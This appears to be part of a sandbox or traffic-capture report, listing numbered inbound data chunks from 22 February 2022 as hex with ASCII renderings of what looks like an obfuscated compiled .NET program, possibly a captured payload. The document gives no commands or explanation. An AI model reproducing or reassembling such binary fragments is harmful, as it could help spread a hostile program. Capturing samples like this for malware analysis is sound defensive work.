2022-02-22 14:30:32 UTC 40 IN Data Raw: 02 00 00 00 fe 09 02 00 a2 20 01 00 00 00 8d 03 00 00 01 fe 0e 27 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0b 00 20 01 00 00 00 8d 1a 00 00 01 fe 0e 11 00 7f 5a 00 00 04 fe 0e 00 00 fe 0c 00 00 fe 0e 1e 00 fe 0c 1e 00 fe 0e 08 00 00 fe 0c 15 00 20 01 00 00 00 3b 2a 1f 00 00 fe 0c 1e 00 fe 0e 08 00 fe 0c 1e 00 46 fe 0e 17 00 fe 0c 1e 00 20 01 00 00 00 58 fe 0e 1e 00 fe 0c 17 00 20 01 00 00 00 3f ef 03 00 00 fe 0c 17 00 20 1a 00 00 00 3d e1 03 00 00 20 0d 00 00 00 fe 0c 17 00 3f e0 01 00 00 20 0d 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 ba 0a 00 00 20 06 00 00 00 fe 0c 17 00 3f d6 00 00 00 20 06 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 6d 08 00 00 20 03 00 00 00 fe 0c 17 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 17 00 3d 05 00 00 00 38 96 07 00 00 20 01 00 00 00 fe Data Ascii: ' Z ;*F X ? = ? =8 ? =8m ?d =8

2022-02-22 14:30:32 UTC 41 IN Data Raw: 02 00 00 00 fe 0c 00 00 fe 0c 12 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 19 00 fe 0c 19 00 fe 0e 20 00 00 fe 0c 20 00 20 ff ff ff ff 3b 9f 02 00 00 fe 0c 00 00 fe 0c 20 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a 20 00 00 00 00 40 89 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 20 ff ff ff ff 3b 62 00 00 00 fe 0c 13 00 fe 0c 09 00 9a 25 14 40 25 00 00 00 26 fe 0c 13 00 fe 0c 09 00 fe 0c 1c 00 fe 0c 09 00 a3 13 00 00 01 28 18 00 00 0a a2 fe 0c 13 00 fe 0c 09 00 9a 00 fe 0c 0c 00 28 21 00 00 0a 3a 1e 00 00 00 fe 0c 00 00 fe 0c 20 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 20 00 38 49 ff ff ff 00 fe 0c 00 00 fe 0c 20 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0e 00 fe 0c 0e 00 20 01 00 00 00 Data Ascii: X (XXJ ; X XXJ @ X XXJ ;b%@%&((!: X (XXJ 8I X XXJ

2022-02-22 14:30:32 UTC 42 IN Data Raw: 00 dd 95 f5 ff ff fe 0c 05 00 fe 0c 1b 00 fe 0c 24 00 fe 0c 1e 00 fe 0c 16 00 58 4a 9a a2 fe 0c 10 00 fe 0c 1b 00 20 05 00 00 00 9c fe 0c 1b 00 20 01 00 00 00 58 fe 0e 1b 00 fe 0c 1e 00 20 08 00 00 00 58 fe 0e 1e 00 dd 4e f5 ff ff fe 0c 05 00 fe 0c 1b 00 20 03 00 00 00 59 9a 74 1c 00 00 01 fe 0c 05 00 fe 0c 1b 00 20 02 00 00 00 59 9a 74 21 00 00 01 fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a 74 20 00 00 01 7e 18 00 00 04 fe 0c 1e 00 fe 0c 16 00 58 4a 97 29 2b 00 00 11 fe 0c 1b 00 20 03 00 00 00 59 fe 0e 1b 00 fe 0c 1e 00 20 08 00 00 00 58 fe 0e 1e 00 dd dc f4 ff ff fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 20 01 00 00 00 59 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 9a 74 0a 00 00 1b 7e 18 00 00 Data Ascii: $XJ X XN Yt Yt! Yt ~XJ)+ Y X Y Y Yt~

2022-02-22 14:30:32 UTC 44 IN Data Raw: 0f 00 38 6e ff ff ff fe 0c 20 00 20 01 00 00 00 59 fe 0e 0e 00 38 5b ff ff ff 00 fe 0e 1a 00 fe 0c 00 00 20 48 01 00 00 58 fe 0c 1a 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 21 00 fe 0c 21 00 fe 0c 12 00 3b bd 00 00 00 fe 0c 00 00 fe 0c 12 00 58 20 10 00 00 00 58 fe 0c 16 00 58 4a fe 0e 21 00 fe 0c 21 00 20 ff ff ff ff 3b 78 00 00 00 fe 0c 00 00 fe 0c 21 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 20 00 00 00 00 fe 0e 1b 00 fe 0c 00 00 fe 0c 00 00 fe 0c 21 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 14 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 21 00 9e fe 0c 27 00 fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 30 00 00 00 00 fe 0c 00 00 fe 0c 12 00 58 fe 0c 16 00 58 Data Ascii: 8n Y8[ HX ZX XXJ!!;X XXJ!! ;x!X XXJ !X XXJX!' X80XX

2022-02-22 14:30:32 UTC 45 IN Data Raw: 00 28 21 00 00 0a 3a 1e 00 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 28 00 00 00 58 fe 0c 16 00 58 4a fe 0e 1a 00 38 49 ff ff ff 00 fe 0c 00 00 fe 0c 1a 00 58 20 08 00 00 00 58 fe 0c 16 00 58 4a fe 0e 09 00 fe 0c 09 00 20 01 00 00 00 3b b0 00 00 00 fe 0c 09 00 20 02 00 00 00 3b 45 01 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a fe 0e 0f 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 1b 00 20 01 00 00 00 59 fe 0c 0c 00 a2 fe 0c 00 00 fe 0c 00 00 fe 0c 1a 00 58 20 18 00 00 00 58 fe 0c 16 00 58 4a 58 fe 0e 1e 00 fe 0c 11 00 fe 0c 14 00 fe 0c 0c 00 a2 fe 0c 0b 00 fe 0c 14 00 fe 0c 1a 00 9e fe 0c 27 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 Data Ascii: (!:X (XXJ8IX XXJ ; ;EX XXJ Y YX XXJX' X8.

2022-02-22 14:30:32 UTC 46 IN Data Raw: 00 fe 0c 19 00 58 fe 0c 16 00 58 4a fe 0e 19 00 38 42 fe ff ff 38 12 00 00 00 00 fe 0c 04 00 fe 0e 1e 00 20 ff ff ff ff fe 0e 04 00 00 00 dd 5d e5 ff ff fe 0c 1e 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 15 00 5a 58 fe 0e 1e 00 dd 2e e5 ff ff fe 0e 06 00 fe 0c 1f 00 20 01 00 00 00 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 27 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 1b 00 fe 0c 10 00 fe 0c 1b 00 20 00 00 00 00 9c fe 0c 02 00 fe 0c 1b 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd f0 e8 ff ff 00 fe 0c 08 00 fe 0c 00 00 59 fe 0e 1a 00 20 00 00 00 00 fe 0e 0f 00 20 02 00 00 00 fe 0e 0e 00 fe 0c 0f 00 fe 0c 0e 00 58 20 02 00 00 00 5b fe 0e 20 00 fe Data Ascii: XXJ8B8 ]((%~a Y ZX. ;O ;I' Y @0 TY X [

2022-02-22 14:30:32 UTC 48 IN Data Raw: fe 0e 09 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 00 00 a2 fe 0c 08 00 20 01 00 00 00 fe 09 01 00 a2 7f 5b 00 00 04 fe 0e 03 00 fe 0c 03 00 fe 0e 07 00 fe 0c 07 00 fe 0e 05 00 00 fe 0c 00 00 20 01 00 00 00 3b d8 03 00 00 fe 0c 07 00 fe 0e 05 00 fe 0c 07 00 46 fe 0e 0a 00 fe 0c 07 00 20 01 00 00 00 58 fe 0e 07 00 fe 0c 0a 00 20 01 00 00 00 3f 69 01 00 00 fe 0c 0a 00 20 09 00 00 00 3d 5b 01 00 00 20 05 00 00 00 fe 0c 0a 00 3f b0 00 00 00 20 05 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 50 02 00 00 20 02 00 00 00 fe 0c 0a 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 20 01 00 00 20 01 00 00 00 fe 0c 0a 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 0a 00 3d 05 00 00 00 38 f9 00 00 00 38 f3 00 00 00 38 ee 00 00 00 20 Data Ascii: [ ;F X ?i =[ ? =8P ?> =8 ? =888

2022-02-22 14:30:32 UTC 49 IN Data Raw: 64 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 16 01 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 a8 00 00 00 38 a2 00 00 00 20 02 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 88 00 00 00 38 7c 00 00 00 38 77 00 00 00 20 05 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 05 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 32 01 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 ca 00 00 00 38 30 00 00 00 38 2b 00 00 00 20 06 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 06 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 58 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 c7 fe ff ff fe 0c 0d 00 fe 0c 0e 00 fe 0c 0b 00 fe 0c 08 00 fe 0c 01 00 58 4a 9a a2 fe Data Ascii: d =8 ? =88 ? =88|8w ?> =82 ? =8808+ ? =8X888XJ

2022-02-22 14:30:32 UTC 50 IN Data Raw: 03 00 00 20 0d 00 00 00 fe 0c 0c 00 3f 18 00 00 00 20 0d 00 00 00 fe 0c 0c 00 3d 05 00 00 00 38 89 03 00 00 38 30 00 00 00 38 2b 00 00 00 20 0f 00 00 00 fe 0c 0c 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 0c 00 3d 05 00 00 00 38 e4 03 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 71 fd ff ff fe 0c 09 00 fe 0c 04 00 fe 0c 07 00 fe 0c 05 00 fe 0c 10 00 58 4a 9a a2 fe 0c 08 00 fe 0c 04 00 20 05 00 00 00 9c fe 0c 04 00 20 01 00 00 00 58 fe 0e 04 00 fe 0c 05 00 20 08 00 00 00 58 fe 0e 05 00 38 2a fd ff ff fe 0c 09 00 fe 0c 04 00 14 a2 fe 0c 08 00 fe 0c 04 00 20 05 00 00 00 9c fe 0c 04 00 20 01 00 00 00 58 fe 0e 04 00 38 ff fc ff ff fe 0c 0a 00 fe 0c 04 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 09 00 fe 0c 04 00 20 02 00 00 00 59 9a fe 0c 09 00 fe 0c 04 00 20 01 Data Ascii: ? =8808+ ? =8888qXJ X X8* X8 Y Y

2022-02-22 14:30:32 UTC 52 IN Data Raw: 08 00 fe 0c 09 00 20 01 00 00 00 3f 8f 01 00 00 fe 0c 09 00 20 0a 00 00 00 3d 81 01 00 00 20 05 00 00 00 fe 0c 09 00 3f b0 00 00 00 20 05 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 54 02 00 00 20 02 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 46 01 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 1f 01 00 00 38 19 01 00 00 38 14 01 00 00 20 03 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 41 01 00 00 38 ee 00 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 62 01 00 00 38 c8 00 00 00 38 c3 00 00 00 20 08 00 00 00 fe 0c 09 00 3f 64 00 00 00 20 08 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 9d 02 00 00 20 06 Data Ascii: ? = ? =8T ?> =8F ? =888 ? =8A8 ? =8b88 ?d =8

2022-02-22 14:30:32 UTC 53 IN Data Raw: 00 00 20 01 00 00 00 58 fe 0e 00 00 fe 0c 0d 00 20 01 00 00 00 3f ef 03 00 00 fe 0c 0d 00 20 1a 00 00 00 3d e1 03 00 00 20 0d 00 00 00 fe 0c 0d 00 3f e0 01 00 00 20 0d 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 12 07 00 00 20 06 00 00 00 fe 0c 0d 00 3f d6 00 00 00 20 06 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 bc 04 00 00 20 03 00 00 00 fe 0c 0d 00 3f 64 00 00 00 20 03 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 cc 03 00 00 20 01 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 5e 03 00 00 38 58 03 00 00 20 02 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 02 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 3e 03 00 00 38 32 03 00 00 38 2d 03 00 00 20 04 00 00 00 fe 0c 0d 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 0d 00 3d 05 00 00 00 38 85 03 00 00 38 07 Data Ascii: X ? = ? =8 ? =8 ?d =8 ? =8^8X ? =8>828- ? =88

2022-02-22 14:30:32 UTC 54 IN Data Raw: 00 00 00 59 8f 04 00 00 01 e0 4a fe 01 54 fe 0c 04 00 fe 0c 10 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 10 00 20 01 00 00 00 59 fe 0e 10 00 38 51 fa ff ff fe 0c 08 00 fe 0c 00 00 fe 0c 0a 00 58 4a 8f 12 00 00 01 fe 0c 03 00 fe 0c 10 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 52 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 fe 0c 10 00 20 01 00 00 00 59 fe 0e 10 00 38 07 fa ff ff fe 0c 04 00 fe 0c 10 00 20 00 00 00 00 9c fe 0c 03 00 fe 0c 10 00 8f 04 00 00 01 e0 fe 0c 08 00 fe 0c 00 00 fe 0c 0a 00 58 4a 8f 12 00 00 01 47 54 fe 0c 05 00 fe 0c 10 00 14 a2 fe 0c 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 ab f9 ff ff fe 0c 03 00 fe 0c 10 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 00 00 fe 0c 0a 00 Data Ascii: YJT Y Y8QXJ YJR X Y8 XJGT X X8 YJ

2022-02-22 14:30:32 UTC 58 IN Data Raw: 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 d2 f6 ff ff fe 0c 09 00 fe 0c 10 00 fe 0c 00 00 fe 0c 08 00 fe 0c 0e 00 58 4a 9a a2 fe 0c 07 00 fe 0c 10 00 20 05 00 00 00 9c fe 0c 10 00 20 01 00 00 00 58 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 8b f6 ff ff fe 0c 07 00 fe 0c 10 00 20 03 00 00 00 59 20 05 00 00 00 9c fe 0c 09 00 fe 0c 10 00 20 03 00 00 00 59 fe 0c 09 00 fe 0c 10 00 20 03 00 00 00 59 9a 74 0b 00 00 1b fe 0c 09 00 fe 0c 10 00 20 02 00 00 00 59 9a 74 0c 00 00 1b fe 0c 09 00 fe 0c 10 00 20 01 00 00 00 59 9a 74 0d 00 00 1b 7e 1e 00 00 04 fe 0c 08 00 fe 0c 0e 00 58 4a 97 29 36 00 00 11 a2 fe 0c 10 00 20 02 00 00 00 59 fe 0e 10 00 fe 0c 08 00 20 08 00 00 00 58 fe 0e 08 00 38 f6 f5 ff ff fe 0c 07 00 Data Ascii: X X8XJ X X8 Y Y Yt Yt Yt~XJ)6 Y X8

2022-02-22 14:30:32 UTC 62 IN Data Raw: 0f 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 7e f6 ff ff fe 0c 05 00 fe 0c 0c 00 fe 0c 03 00 58 4a 8f 12 00 00 01 fe 0c 09 00 fe 0c 0f 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 52 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 34 f6 ff ff fe 0c 0b 00 fe 0c 0f 00 20 00 00 00 00 9c fe 0c 09 00 fe 0c 0f 00 8f 04 00 00 01 e0 fe 0c 05 00 fe 0c 0c 00 fe 0c 03 00 58 4a 8f 12 00 00 01 47 54 fe 0c 01 00 fe 0c 0f 00 14 a2 fe 0c 0f 00 20 01 00 00 00 58 fe 0e 0f 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 d8 f5 ff ff fe 0c 09 00 fe 0c 0f 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 20 00 00 00 00 fe 01 fe 0c 0c 00 fe 0c 03 00 58 4a fe 0c 0c 00 20 08 00 00 00 58 fe 0c 03 00 58 4a 59 5a Data Ascii: Y Y8~XJ YJR X Y84 XJGT X X8 YJ XJ XXJYZ

2022-02-22 14:30:32 UTC 64 IN Data Raw: 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a 74 21 00 00 01 7e 1f 00 00 04 fe 0c 0c 00 fe 0c 03 00 58 4a 97 29 42 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 56 f2 ff ff fe 0c 07 00 fe 0c 0c 00 fe 0c 03 00 58 4a fe 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 0f 00 20 01 00 00 00 59 fe 0e 0f 00 38 17 f2 ff ff fe 0c 0b 00 fe 0c 0f 00 20 05 00 00 00 9c fe 0c 01 00 fe 0c 0f 00 fe 0c 07 00 fe 0c 0c 00 fe 0c 03 00 58 4a 9a a2 fe 0c 0f 00 20 01 00 00 00 58 fe 0e 0f 00 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 d0 f1 ff ff fe 0c 09 00 fe 0c 0f 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 01 00 fe 0c 0f 00 20 02 00 00 00 59 9a 74 23 00 00 01 fe 0c 01 00 fe 0c 0f 00 20 01 00 00 00 59 9a fe 01 54 fe 0c 0b Data Ascii: Yt!~XJ)B X8VXJ Y X Y8 XJ X X8 Y Yt# YT

2022-02-22 14:30:32 UTC 68 IN Data Raw: 2a 2a fe 09 00 00 6f 36 00 00 0a 2a 2a fe 09 00 00 6f 37 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 38 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 28 39 00 00 0a 2a 2a fe 09 00 00 6f 3a 00 00 0a 2a 2a fe 09 00 00 6f 3b 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3c 00 00 0a 2a 3a fe 09 00 00 fe 09 01 00 6f 3d 00 00 0a 2a 00 13 30 03 00 dc 00 00 00 00 00 00 00 20 0c 00 00 00 8d 06 00 00 01 80 1f 00 00 04 7e 1f 00 00 04 20 00 00 00 00 fe 06 77 00 00 06 9b 7e 1f 00 00 04 20 01 00 00 00 fe 06 78 00 00 06 9b 7e 1f 00 00 04 20 02 00 00 00 fe 06 79 00 00 06 9b 7e 1f 00 00 04 20 03 00 00 00 fe 06 7a 00 00 06 9b 7e 1f 00 00 04 20 04 00 00 00 fe 06 7b 00 00 06 9b 7e 1f 00 00 04 20 05 00 00 00 fe 06 7c 00 00 06 9b 7e 1f 00 00 04 20 06 00 00 00 fe 06 7d 00 00 06 9b 7e 1f 00 Data Ascii: **o6**o7*:o8*:(9**o:**o;*:o<*:o=*0 ~ w~ x~ y~ z~ {~ |~ }~

2022-02-22 14:30:32 UTC 72 IN Data Raw: fe 0c 05 00 58 4a 9a a2 fe 0c 03 00 fe 0c 01 00 20 05 00 00 00 9c fe 0c 01 00 20 01 00 00 00 58 fe 0e 01 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 46 fc ff ff fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 9a 75 1c 00 00 01 a2 fe 0c 03 00 fe 0c 01 00 20 01 00 00 00 59 20 05 00 00 00 9c 38 0a fc ff ff fe 0c 11 00 fe 0c 07 00 fe 0c 05 00 58 4a fe 0c 08 00 fe 0c 01 00 20 01 00 00 00 59 9a a2 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 fe 0c 01 00 20 01 00 00 00 59 fe 0e 01 00 38 cb fb ff ff fe 0c 03 00 fe 0c 01 00 20 05 00 00 00 9c fe 0c 08 00 fe 0c 01 00 fe 0c 11 00 fe 0c 07 00 fe 0c 05 00 58 4a 9a a2 fe 0c 01 00 20 01 00 00 00 58 fe 0e 01 00 fe 0c 07 00 20 08 00 00 00 58 fe 0e 07 00 38 84 fb ff ff fe 0c 08 00 fe 0c Data Ascii: XJ X X8F Y Yu Y 8XJ Y X Y8 XJ X X8

2022-02-22 14:30:32 UTC 76 IN Data Raw: 0c 04 00 3d 05 00 00 00 38 c2 00 00 00 38 2b 00 00 00 20 04 00 00 00 fe 0c 04 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 04 00 3d 05 00 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 fe 0c 0b 00 fe 0c 00 00 fe 0c 03 00 fe 0c 09 00 fe 0c 0a 00 58 4a 9a a2 fe 0c 08 00 fe 0c 00 00 20 05 00 00 00 9c fe 0c 00 00 20 01 00 00 00 58 fe 0e 00 00 fe 0c 09 00 20 08 00 00 00 58 fe 0e 09 00 38 d2 fe ff ff fe 0c 0b 00 fe 0c 00 00 20 01 00 00 00 59 9a 74 09 00 00 02 7e 2a 00 00 04 fe 0c 09 00 fe 0c 0a 00 58 4a 97 29 1e 00 00 11 fe 0c 00 00 20 01 00 00 00 59 fe 0e 00 00 fe 0c 09 00 20 08 00 00 00 58 fe 0e 09 00 38 88 fe ff ff 00 38 82 fe ff ff fe 0c 09 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0d 00 5a 58 fe 0e 09 00 Data Ascii: =88+ ? =888XJ X X8 Yt~*XJ) Y X88((%~a Y ZX

2022-02-22 14:30:32 UTC 80 IN Data Raw: 00 01 7e 2b 00 00 04 fe 0c 27 00 fe 0c 10 00 58 4a 97 29 55 00 00 11 a2 fe 0c 2a 00 20 01 00 00 00 59 fe 0e 2a 00 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 dd 53 f1 ff ff fe 0c 0e 00 fe 0c 27 00 fe 0c 10 00 58 4a fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 9a a2 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 fe 0c 2a 00 20 01 00 00 00 59 fe 0e 2a 00 dd 14 f1 ff ff fe 0c 2c 00 fe 0c 2a 00 20 05 00 00 00 9c fe 0c 0c 00 fe 0c 2a 00 7e 2b 00 00 04 fe 0c 27 00 fe 0c 10 00 58 4a 97 29 02 00 00 11 a2 fe 0c 2a 00 20 01 00 00 00 58 fe 0e 2a 00 fe 0c 27 00 20 08 00 00 00 58 fe 0e 27 00 dd c7 f0 ff ff fe 0c 2c 00 fe 0c 2a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 fe 0c 0c 00 fe 0c 2a 00 20 01 00 00 00 59 9a 74 05 00 00 01 7e 2b 00 00 Data Ascii: ~+'XJ)U* Y*' X'S'XJ* Y' X'* Y*,* *~+'XJ)* X*' X',* Y * Y* Yt~+

2022-02-22 14:30:32 UTC 84 IN Data Raw: fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 22 00 fe 0c 19 00 7a 00 38 51 03 00 00 00 fe 0c 0d 00 fe 0c 0d 00 fe 0c 15 00 fe 0c 14 00 94 58 fe 0c 10 00 58 4a 58 fe 0c 10 00 58 4a fe 0e 11 00 20 ff ff ff ff fe 0c 12 00 3b 1e 03 00 00 fe 0c 1d 00 fe 0c 12 00 3b ff 02 00 00 fe 0c 12 00 fe 0c 0d 00 59 fe 0e 2b 00 00 fe 0c 14 00 20 00 00 00 00 3b 17 01 00 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 2b 00 fe 0e 02 00 20 00 00 00 00 fe 0e 13 00 20 04 00 00 00 fe 0e 20 00 fe 0c 13 00 fe 0c 20 00 58 20 02 00 00 00 5b fe 0e 26 00 fe 0c 0d 00 20 e3 03 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 fe 0c 10 00 58 4a fe 0e 21 00 fe 0c 0d 00 20 e3 03 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 08 00 Data Ascii: X8 "z8QXXJXXJ ;;Y+ ; Y+ X [& X& ZXXJ! X& ZX

2022-02-22 14:30:32 UTC 88 IN Data Raw: ff 00 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 9a 2a 00 00 00 13 30 07 00 0e 17 00 00 61 00 00 11 fe 0d 04 00 25 20 01 00 00 00 54 46 fe 0e 03 00 fe 0c 03 00 20 04 00 00 00 5a fe 0e 07 00 fe 0c 03 00 20 08 00 00 00 5a fe 0e 0e 00 20 04 00 00 00 8d 01 00 00 01 fe 0e 02 00 20 04 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 04 00 00 00 8d 03 00 00 01 fe 0e 06 00 20 01 00 00 00 8d 12 00 00 01 25 fe 0e 15 00 fe 0e 10 00 20 06 00 00 00 8d 03 00 00 01 25 fe 0e 01 00 fe 0e 09 00 20 02 00 00 00 8d 04 00 00 01 25 fe 0e 08 00 fe 0e 0c 00 20 04 00 00 00 8d 04 00 00 01 25 fe 0e 0f 00 fe 0e 13 00 20 03 00 00 00 8d 02 00 00 01 fe 0e 12 00 fe 0c 0c 00 20 00 00 00 00 8f 04 00 00 01 fe 09 00 00 55 fe 0c 12 00 20 00 00 00 00 fe 09 01 00 a2 7f 69 00 00 04 fe 0e 0a 00 fe 0c 0a 00 Data Ascii: Y*0a% TF Z Z % % % % U i

2022-02-22 14:30:32 UTC 92 IN Data Raw: 00 58 fe 0e 00 00 38 7c f0 ff ff fe 0c 02 00 fe 0c 05 00 20 05 00 00 00 9c fe 0c 0b 00 fe 0c 05 00 7e 2d 00 00 04 fe 0c 00 00 fe 0c 07 00 58 4a 97 29 67 00 00 11 a2 fe 0c 05 00 20 01 00 00 00 58 fe 0e 05 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 2f f0 ff ff fe 0c 02 00 fe 0c 05 00 20 01 00 00 00 59 20 02 00 00 00 9c fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 8f 04 00 00 01 e0 fe 0c 13 00 fe 0c 05 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4c 7e 2d 00 00 04 fe 0c 00 00 fe 0c 07 00 58 4a 97 29 63 00 00 11 df fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 c9 ef ff ff fe 0c 02 00 fe 0c 05 00 20 02 00 00 00 59 20 05 00 00 00 9c fe 0c 0b 00 fe 0c 05 00 20 02 00 00 00 59 fe 0c 13 00 fe 0c 05 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4d fe 0c 13 00 fe 0c 05 00 20 01 Data Ascii: X8| ~-XJ)g X X8/ Y Y YL~-XJ)c X8 Y Y YM

